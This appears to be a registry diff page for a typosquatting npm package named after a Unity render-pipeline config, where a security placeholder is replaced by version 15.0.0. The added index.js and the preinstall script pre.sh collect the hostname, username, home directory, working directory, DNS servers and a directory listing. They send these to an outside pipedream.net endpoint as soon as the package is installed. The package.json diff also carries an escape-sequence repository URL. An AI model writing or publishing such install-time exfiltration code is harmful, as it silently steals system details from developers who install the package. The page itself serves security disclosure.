com.unity.render-pipelines.high-definition-config 0.0.1-security → 15.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of com.unity.render-pipelines.high-definition-config might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +46 -0
  2. package/package.json +18 -3
  3. package/pre.sh +3 -0
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,46 @@
1
+
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "https://ec38e3e0ac2257d8acd3b379c3bc901a.m.pipedream.net", //replace burpcollaborator.net with Interactsh or pipedream
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/json",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.write(postData);
46
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,21 @@
1
1
  {
2
2
  "name": "com.unity.render-pipelines.high-definition-config",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "15.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "pre.sh"
8
+ },
9
+ "author": "Kumar",
10
+ "license": "ISC",
11
+ "repository": {
12
+ "type": "git",
13
+ "url": "\u001b[A\u001b[D\u001b[D\u001b[D"
14
+ },
15
+ "keywords": [],
16
+ "description": "bugcrowd",
17
+ "dependencies": {
18
+ "com.unity.searcher": "^5.0.0"
19
+ },
20
+ "devDependencies": {}
6
21
  }
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64) https://ec38e3e0ac2257d8acd3b379c3bc901a.m.pipedream.net
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=com.unity.render-pipelines.high-definition-config for more information.